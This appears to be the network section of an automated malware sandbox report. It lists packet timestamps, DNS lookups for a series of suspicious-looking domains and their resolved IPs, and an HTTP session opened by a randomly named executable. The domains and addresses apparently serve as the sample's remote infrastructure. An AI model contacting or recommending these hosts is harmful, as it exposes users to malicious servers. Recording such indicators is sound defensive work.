                                                                        Dec 13, 2024 13:09:28.187503099 CET8050032144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:28.187530994 CET8050032144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:28.187550068 CET8050032144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:28.187568903 CET8050032144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:28.187588930 CET8050032144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:28.187627077 CET8050032144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:28.187644958 CET8050032144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:28.187664032 CET8050032144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:29.106834888 CET5003280192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:29.227488041 CET8050032144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:29.227585077 CET5003280192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:30.126425982 CET5003380192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:30.246561050 CET8050033144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:30.246742010 CET5003380192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:30.255120993 CET5003380192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:30.376009941 CET8050033144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:31.568196058 CET8050033144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:31.568219900 CET8050033144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:31.568360090 CET5003380192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:31.571218014 CET5003380192.168.2.4144.76.190.39
                                                                        Dec 13, 2024 13:09:31.691075087 CET8050033144.76.190.39192.168.2.4
                                                                        Dec 13, 2024 13:09:45.534873009 CET5003480192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:45.655088902 CET8050034198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:45.657392025 CET5003480192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:45.668402910 CET5003480192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:45.788322926 CET8050034198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:46.998615026 CET8050034198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:46.998641968 CET8050034198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:46.998712063 CET5003480192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:47.169636011 CET5003480192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:48.188384056 CET5003580192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:48.309082985 CET8050035198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:48.309489965 CET5003580192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:48.322998047 CET5003580192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:48.444027901 CET8050035198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:49.661906004 CET8050035198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:49.662259102 CET8050035198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:49.662523031 CET5003580192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:49.825810909 CET5003580192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:50.844633102 CET5003680192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:50.964766979 CET8050036198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:50.964895964 CET5003680192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:50.983047009 CET5003680192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:51.103146076 CET8050036198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:51.103161097 CET8050036198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:51.103207111 CET8050036198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:51.103215933 CET8050036198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:51.103286028 CET8050036198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:51.103295088 CET8050036198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:51.103429079 CET8050036198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:51.103436947 CET8050036198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:51.103461027 CET8050036198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:52.307467937 CET8050036198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:52.307486057 CET8050036198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:52.307579994 CET5003680192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:52.497533083 CET5003680192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:53.520292997 CET5003780192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:53.640333891 CET8050037198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:53.640429974 CET5003780192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:53.647983074 CET5003780192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:53.767946959 CET8050037198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:54.980513096 CET8050037198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:54.980544090 CET8050037198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:09:54.980655909 CET5003780192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:54.983489037 CET5003780192.168.2.4198.251.84.200
                                                                        Dec 13, 2024 13:09:55.103297949 CET8050037198.251.84.200192.168.2.4
                                                                        Dec 13, 2024 13:10:00.715514898 CET5003880192.168.2.4217.160.0.60
                                                                        Dec 13, 2024 13:10:00.835398912 CET8050038217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:00.835500002 CET5003880192.168.2.4217.160.0.60
                                                                        Dec 13, 2024 13:10:00.847841978 CET5003880192.168.2.4217.160.0.60
                                                                        Dec 13, 2024 13:10:00.967751026 CET8050038217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:02.206742048 CET8050038217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:02.206782103 CET8050038217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:02.206800938 CET8050038217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:02.206907034 CET5003880192.168.2.4217.160.0.60
                                                                        Dec 13, 2024 13:10:02.357220888 CET5003880192.168.2.4217.160.0.60
                                                                        Dec 13, 2024 13:10:03.377017975 CET5003980192.168.2.4217.160.0.60
                                                                        Dec 13, 2024 13:10:03.496975899 CET8050039217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:03.497073889 CET5003980192.168.2.4217.160.0.60
                                                                        Dec 13, 2024 13:10:03.508893967 CET5003980192.168.2.4217.160.0.60
                                                                        Dec 13, 2024 13:10:03.628684044 CET8050039217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:04.777515888 CET8050039217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:04.777553082 CET8050039217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:04.777566910 CET8050039217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:04.777591944 CET5003980192.168.2.4217.160.0.60
                                                                        Dec 13, 2024 13:10:04.777636051 CET5003980192.168.2.4217.160.0.60
                                                                        Dec 13, 2024 13:10:05.013232946 CET5003980192.168.2.4217.160.0.60
                                                                        Dec 13, 2024 13:10:06.032824993 CET5004080192.168.2.4217.160.0.60
                                                                        Dec 13, 2024 13:10:06.153043032 CET8050040217.160.0.60192.168.2.4
                                                                        Dec 13, 2024 13:10:06.155781031 CET5004080192.168.2.4217.160.0.60
                                                                        Dec 13, 2024 13:10:06.165910006 CET5004080192.168.2.4217.160.0.60
Dec 13, 2024 13:10:06.285804033 CET | 80 | 50040 | 217.160.0.60 | 192.168.2.4
Dec 13, 2024 13:10:06.285819054 CET | 80 | 50040 | 217.160.0.60 | 192.168.2.4
Dec 13, 2024 13:10:06.285837889 CET | 80 | 50040 | 217.160.0.60 | 192.168.2.4
Dec 13, 2024 13:10:06.285845995 CET | 80 | 50040 | 217.160.0.60 | 192.168.2.4
Dec 13, 2024 13:10:06.285926104 CET | 80 | 50040 | 217.160.0.60 | 192.168.2.4
Dec 13, 2024 13:10:06.285943985 CET | 80 | 50040 | 217.160.0.60 | 192.168.2.4
Dec 13, 2024 13:10:06.285995007 CET | 80 | 50040 | 217.160.0.60 | 192.168.2.4
Dec 13, 2024 13:10:06.286026001 CET | 80 | 50040 | 217.160.0.60 | 192.168.2.4
Dec 13, 2024 13:10:06.286058903 CET | 80 | 50040 | 217.160.0.60 | 192.168.2.4
Dec 13, 2024 13:10:07.610346079 CET | 80 | 50040 | 217.160.0.60 | 192.168.2.4
Dec 13, 2024 13:10:07.610388041 CET | 80 | 50040 | 217.160.0.60 | 192.168.2.4
Dec 13, 2024 13:10:07.610400915 CET | 80 | 50040 | 217.160.0.60 | 192.168.2.4
Dec 13, 2024 13:10:07.610446930 CET | 50040 | 80 | 192.168.2.4 | 217.160.0.60
Dec 13, 2024 13:10:07.669616938 CET | 50040 | 80 | 192.168.2.4 | 217.160.0.60
Dec 13, 2024 13:10:08.689361095 CET | 50041 | 80 | 192.168.2.4 | 217.160.0.60
Dec 13, 2024 13:10:08.810501099 CET | 80 | 50041 | 217.160.0.60 | 192.168.2.4
Dec 13, 2024 13:10:08.810578108 CET | 50041 | 80 | 192.168.2.4 | 217.160.0.60
Dec 13, 2024 13:10:08.819462061 CET | 50041 | 80 | 192.168.2.4 | 217.160.0.60
Dec 13, 2024 13:10:08.940838099 CET | 80 | 50041 | 217.160.0.60 | 192.168.2.4
Dec 13, 2024 13:10:10.090229034 CET | 80 | 50041 | 217.160.0.60 | 192.168.2.4
Dec 13, 2024 13:10:10.090253115 CET | 80 | 50041 | 217.160.0.60 | 192.168.2.4
Dec 13, 2024 13:10:10.090269089 CET | 80 | 50041 | 217.160.0.60 | 192.168.2.4
Dec 13, 2024 13:10:10.090286970 CET | 80 | 50041 | 217.160.0.60 | 192.168.2.4
Dec 13, 2024 13:10:10.090460062 CET | 50041 | 80 | 192.168.2.4 | 217.160.0.60
Dec 13, 2024 13:10:10.090636969 CET | 80 | 50041 | 217.160.0.60 | 192.168.2.4
Dec 13, 2024 13:10:10.091394901 CET | 50041 | 80 | 192.168.2.4 | 217.160.0.60
Dec 13, 2024 13:10:10.097253084 CET | 50041 | 80 | 192.168.2.4 | 217.160.0.60
Dec 13, 2024 13:10:10.217304945 CET | 80 | 50041 | 217.160.0.60 | 192.168.2.4
Dec 13, 2024 13:10:15.648977995 CET | 50042 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:10:15.769026041 CET | 80 | 50042 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:10:15.777287006 CET | 50042 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:10:15.841300964 CET | 50042 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:10:15.963160038 CET | 80 | 50042 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:10:17.022445917 CET | 80 | 50042 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:10:17.022486925 CET | 80 | 50042 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:10:17.022532940 CET | 50042 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:10:17.022566080 CET | 80 | 50042 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:10:17.022605896 CET | 50042 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:10:17.341507912 CET | 50042 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:10:18.491420031 CET | 50043 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:10:18.611309052 CET | 80 | 50043 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:10:18.620292902 CET | 50043 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:10:19.085571051 CET | 50043 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:10:19.205663919 CET | 80 | 50043 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:10:19.888510942 CET | 80 | 50043 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:10:19.888567924 CET | 80 | 50043 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:10:19.888607979 CET | 80 | 50043 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:10:19.888643980 CET | 50043 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:10:19.888705015 CET | 50043 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:10:20.591407061 CET | 50043 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:10:22.000976086 CET | 50044 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:10:22.120795012 CET | 80 | 50044 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:10:22.121390104 CET | 50044 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:10:22.133514881 CET | 50044 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:10:22.253410101 CET | 80 | 50044 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:10:22.253520966 CET | 80 | 50044 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:10:22.253530979 CET | 80 | 50044 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:10:22.253539085 CET | 80 | 50044 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:10:22.253592968 CET | 80 | 50044 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:10:22.253601074 CET | 80 | 50044 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:10:22.253612995 CET | 80 | 50044 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:10:22.360888004 CET | 80 | 50044 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:10:22.360899925 CET | 80 | 50044 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:10:23.366647959 CET | 80 | 50044 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:10:23.366672993 CET | 80 | 50044 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:10:23.366724014 CET | 50044 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:10:23.451375961 CET | 80 | 50044 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:10:23.451441050 CET | 50044 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:10:23.638267040 CET | 50044 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:10:24.657174110 CET | 50045 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:10:24.781017065 CET | 80 | 50045 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:10:24.781128883 CET | 50045 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:10:24.790267944 CET | 50045 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:10:24.910090923 CET | 80 | 50045 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:10:26.132560968 CET | 80 | 50045 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:10:26.132584095 CET | 80 | 50045 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:10:26.132594109 CET | 80 | 50045 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:10:26.132643938 CET | 80 | 50045 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:10:26.132785082 CET | 50045 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:10:26.132785082 CET | 50045 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:10:26.139923096 CET | 50045 | 80 | 192.168.2.4 | 161.97.142.144
Dec 13, 2024 13:10:26.259874105 CET | 80 | 50045 | 161.97.142.144 | 192.168.2.4
Dec 13, 2024 13:10:46.893759966 CET | 50050 | 80 | 192.168.2.4 | 3.33.130.190
Dec 13, 2024 13:10:47.014014006 CET | 80 | 50050 | 3.33.130.190 | 192.168.2.4
Dec 13, 2024 13:10:47.014106989 CET | 50050 | 80 | 192.168.2.4 | 3.33.130.190
Dec 13, 2024 13:10:47.026427984 CET | 50050 | 80 | 192.168.2.4 | 3.33.130.190
Dec 13, 2024 13:10:47.146310091 CET | 80 | 50050 | 3.33.130.190 | 192.168.2.4
Dec 13, 2024 13:10:48.112895966 CET | 80 | 50050 | 3.33.130.190 | 192.168.2.4
Dec 13, 2024 13:10:48.112945080 CET | 80 | 50050 | 3.33.130.190 | 192.168.2.4
Dec 13, 2024 13:10:48.113014936 CET | 50050 | 80 | 192.168.2.4 | 3.33.130.190
Dec 13, 2024 13:10:48.529366016 CET | 50050 | 80 | 192.168.2.4 | 3.33.130.190
Dec 13, 2024 13:10:49.547647953 CET | 50051 | 80 | 192.168.2.4 | 3.33.130.190
Dec 13, 2024 13:10:49.667515039 CET | 80 | 50051 | 3.33.130.190 | 192.168.2.4
Dec 13, 2024 13:10:49.667680979 CET | 50051 | 80 | 192.168.2.4 | 3.33.130.190
Dec 13, 2024 13:10:49.679757118 CET | 50051 | 80 | 192.168.2.4 | 3.33.130.190
Dec 13, 2024 13:10:49.799552917 CET | 80 | 50051 | 3.33.130.190 | 192.168.2.4
Dec 13, 2024 13:10:50.763427973 CET | 80 | 50051 | 3.33.130.190 | 192.168.2.4
Dec 13, 2024 13:10:50.763453960 CET | 80 | 50051 | 3.33.130.190 | 192.168.2.4
Dec 13, 2024 13:10:50.763552904 CET | 50051 | 80 | 192.168.2.4 | 3.33.130.190
Dec 13, 2024 13:10:51.185239077 CET | 50051 | 80 | 192.168.2.4 | 3.33.130.190
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 13, 2024 13:06:46.087924004 CET | 63345 | 53 | 192.168.2.4 | 1.1.1.1
Dec 13, 2024 13:06:47.075742960 CET | 63345 | 53 | 192.168.2.4 | 1.1.1.1
Dec 13, 2024 13:06:47.216994047 CET | 53 | 63345 | 1.1.1.1 | 192.168.2.4
Dec 13, 2024 13:06:47.217004061 CET | 53 | 63345 | 1.1.1.1 | 192.168.2.4
Dec 13, 2024 13:07:03.854353905 CET | 50847 | 53 | 192.168.2.4 | 1.1.1.1
Dec 13, 2024 13:07:04.227193117 CET | 53 | 50847 | 1.1.1.1 | 192.168.2.4
Dec 13, 2024 13:07:18.594589949 CET | 51924 | 53 | 192.168.2.4 | 1.1.1.1
Dec 13, 2024 13:07:19.098153114 CET | 53 | 51924 | 1.1.1.1 | 192.168.2.4
Dec 13, 2024 13:07:33.579222918 CET | 56973 | 53 | 192.168.2.4 | 1.1.1.1
Dec 13, 2024 13:07:33.973871946 CET | 53 | 56973 | 1.1.1.1 | 192.168.2.4
Dec 13, 2024 13:08:33.486896992 CET | 50702 | 53 | 192.168.2.4 | 1.1.1.1
Dec 13, 2024 13:08:33.803704977 CET | 53 | 50702 | 1.1.1.1 | 192.168.2.4
Dec 13, 2024 13:08:48.784070969 CET | 53804 | 53 | 192.168.2.4 | 1.1.1.1
Dec 13, 2024 13:08:49.477361917 CET | 53 | 53804 | 1.1.1.1 | 192.168.2.4
Dec 13, 2024 13:09:03.707334995 CET | 63841 | 53 | 192.168.2.4 | 1.1.1.1
Dec 13, 2024 13:09:04.076507092 CET | 53 | 63841 | 1.1.1.1 | 192.168.2.4
Dec 13, 2024 13:09:21.299566031 CET | 53053 | 53 | 192.168.2.4 | 1.1.1.1
Dec 13, 2024 13:09:22.138940096 CET | 53 | 53053 | 1.1.1.1 | 192.168.2.4
Dec 13, 2024 13:09:36.583359957 CET | 62473 | 53 | 192.168.2.4 | 1.1.1.1
Dec 13, 2024 13:09:37.018965960 CET | 53 | 62473 | 1.1.1.1 | 192.168.2.4
Dec 13, 2024 13:09:45.080786943 CET | 53805 | 53 | 192.168.2.4 | 1.1.1.1
Dec 13, 2024 13:09:45.532730103 CET | 53 | 53805 | 1.1.1.1 | 192.168.2.4
Dec 13, 2024 13:10:00.011334896 CET | 61069 | 53 | 192.168.2.4 | 1.1.1.1
Dec 13, 2024 13:10:00.713052988 CET | 53 | 61069 | 1.1.1.1 | 192.168.2.4
Dec 13, 2024 13:10:15.118319988 CET | 56287 | 53 | 192.168.2.4 | 1.1.1.1
Dec 13, 2024 13:10:15.645673037 CET | 53 | 56287 | 1.1.1.1 | 192.168.2.4
Dec 13, 2024 13:10:31.142157078 CET | 59477 | 53 | 192.168.2.4 | 1.1.1.1
Dec 13, 2024 13:10:31.472239971 CET | 53 | 59477 | 1.1.1.1 | 192.168.2.4
Dec 13, 2024 13:10:46.235894918 CET | 52756 | 53 | 192.168.2.4 | 1.1.1.1
Dec 13, 2024 13:10:46.891304970 CET | 53 | 52756 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 13, 2024 13:06:46.087924004 CET | 192.168.2.4 | 1.1.1.1 | 0x5fa1 | Standard query (0) | www.idsmart.online | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:06:47.075742960 CET | 192.168.2.4 | 1.1.1.1 | 0x5fa1 | Standard query (0) | www.idsmart.online | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:07:03.854353905 CET | 192.168.2.4 | 1.1.1.1 | 0xf50 | Standard query (0) | www.sortcouponspot.shop | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:07:18.594589949 CET | 192.168.2.4 | 1.1.1.1 | 0x4af | Standard query (0) | www.030002128.xyz | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:07:33.579222918 CET | 192.168.2.4 | 1.1.1.1 | 0x8024 | Standard query (0) | www.quicktraze.website | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:08:33.486896992 CET | 192.168.2.4 | 1.1.1.1 | 0x3257 | Standard query (0) | www.tenmyk.shop | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:08:48.784070969 CET | 192.168.2.4 | 1.1.1.1 | 0x9607 | Standard query (0) | www.tlcatlas.xyz | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:09:03.707334995 CET | 192.168.2.4 | 1.1.1.1 | 0xe1b6 | Standard query (0) | www.xphone.net | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:09:21.299566031 CET | 192.168.2.4 | 1.1.1.1 | 0xaa84 | Standard query (0) | www.basicreviews.online | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:09:36.583359957 CET | 192.168.2.4 | 1.1.1.1 | 0x1bde | Standard query (0) | www.89180.app | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:09:45.080786943 CET | 192.168.2.4 | 1.1.1.1 | 0x680d | Standard query (0) | www.stationseek.online | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:10:00.011334896 CET | 192.168.2.4 | 1.1.1.1 | 0x1993 | Standard query (0) | www.solarand.online | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:10:15.118319988 CET | 192.168.2.4 | 1.1.1.1 | 0xbf42 | Standard query (0) | www.030002059.xyz | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:10:31.142157078 CET | 192.168.2.4 | 1.1.1.1 | 0x8fdb | Standard query (0) | www.salju777-rtp.click | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:10:46.235894918 CET | 192.168.2.4 | 1.1.1.1 | 0x61d | Standard query (0) | www.tdassetmgt.info | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 13, 2024 13:06:47.216994047 CET | 1.1.1.1 | 192.168.2.4 | 0x5fa1 | No error (0) | www.idsmart.online | | 15.204.67.7 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:06:47.217004061 CET | 1.1.1.1 | 192.168.2.4 | 0x5fa1 | No error (0) | www.idsmart.online | | 15.204.67.7 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:07:04.227193117 CET | 1.1.1.1 | 192.168.2.4 | 0xf50 | No error (0) | www.sortcouponspot.shop | | 172.67.158.234 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:07:04.227193117 CET | 1.1.1.1 | 192.168.2.4 | 0xf50 | No error (0) | www.sortcouponspot.shop | | 104.21.90.177 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:07:19.098153114 CET | 1.1.1.1 | 192.168.2.4 | 0x4af | No error (0) | www.030002128.xyz | | 161.97.142.144 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:07:33.973871946 CET | 1.1.1.1 | 192.168.2.4 | 0x8024 | No error (0) | www.quicktraze.website | | 209.74.64.58 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:08:33.803704977 CET | 1.1.1.1 | 192.168.2.4 | 0x3257 | No error (0) | www.tenmyk.shop | | 104.21.74.79 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:08:33.803704977 CET | 1.1.1.1 | 192.168.2.4 | 0x3257 | No error (0) | www.tenmyk.shop | | 172.67.200.118 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:08:49.477361917 CET | 1.1.1.1 | 192.168.2.4 | 0x9607 | No error (0) | www.tlcatlas.xyz | tlcatlas.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Dec 13, 2024 13:08:49.477361917 CET | 1.1.1.1 | 192.168.2.4 | 0x9607 | No error (0) | tlcatlas.xyz | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:08:49.477361917 CET | 1.1.1.1 | 192.168.2.4 | 0x9607 | No error (0) | tlcatlas.xyz | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:09:04.076507092 CET | 1.1.1.1 | 192.168.2.4 | 0xe1b6 | No error (0) | www.xphone.net | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:09:04.076507092 CET | 1.1.1.1 | 192.168.2.4 | 0xe1b6 | No error (0) | www.xphone.net | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:09:22.138940096 CET | 1.1.1.1 | 192.168.2.4 | 0xaa84 | No error (0) | www.basicreviews.online | basicreviews.online | | CNAME (Canonical name) | IN (0x0001) | false
Dec 13, 2024 13:09:22.138940096 CET | 1.1.1.1 | 192.168.2.4 | 0xaa84 | No error (0) | basicreviews.online | | 144.76.190.39 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:09:37.018965960 CET | 1.1.1.1 | 192.168.2.4 | 0x1bde | Server failure (2) | www.89180.app | none | none | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:09:45.532730103 CET | 1.1.1.1 | 192.168.2.4 | 0x680d | No error (0) | www.stationseek.online | stationseek.online | | CNAME (Canonical name) | IN (0x0001) | false
Dec 13, 2024 13:09:45.532730103 CET | 1.1.1.1 | 192.168.2.4 | 0x680d | No error (0) | stationseek.online | | 198.251.84.200 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:10:00.713052988 CET | 1.1.1.1 | 192.168.2.4 | 0x1993 | No error (0) | www.solarand.online | solarand.online | | CNAME (Canonical name) | IN (0x0001) | false
Dec 13, 2024 13:10:00.713052988 CET | 1.1.1.1 | 192.168.2.4 | 0x1993 | No error (0) | solarand.online | | 217.160.0.60 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:10:15.645673037 CET | 1.1.1.1 | 192.168.2.4 | 0xbf42 | No error (0) | www.030002059.xyz | | 161.97.142.144 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:10:31.472239971 CET | 1.1.1.1 | 192.168.2.4 | 0x8fdb | No error (0) | www.salju777-rtp.click | | 172.67.149.64 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:10:31.472239971 CET | 1.1.1.1 | 192.168.2.4 | 0x8fdb | No error (0) | www.salju777-rtp.click | | 104.21.29.140 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:10:46.891304970 CET | 1.1.1.1 | 192.168.2.4 | 0x61d | No error (0) | www.tdassetmgt.info | tdassetmgt.info | | CNAME (Canonical name) | IN (0x0001) | false
Dec 13, 2024 13:10:46.891304970 CET | 1.1.1.1 | 192.168.2.4 | 0x61d | No error (0) | tdassetmgt.info | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:10:46.891304970 CET | 1.1.1.1 | 192.168.2.4 | 0x61d | No error (0) | tdassetmgt.info | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
• www.idsmart.online
• www.sortcouponspot.shop
• www.030002128.xyz
• www.quicktraze.website
• 45.200.148.45
• www.tenmyk.shop
• www.tlcatlas.xyz
• www.xphone.net
• www.basicreviews.online
• www.stationseek.online
• www.solarand.online
• www.030002059.xyz
• www.tdassetmgt.info
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 15.204.67.7 | 80 | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
Timestamp | Bytes transferred | Direction | Data
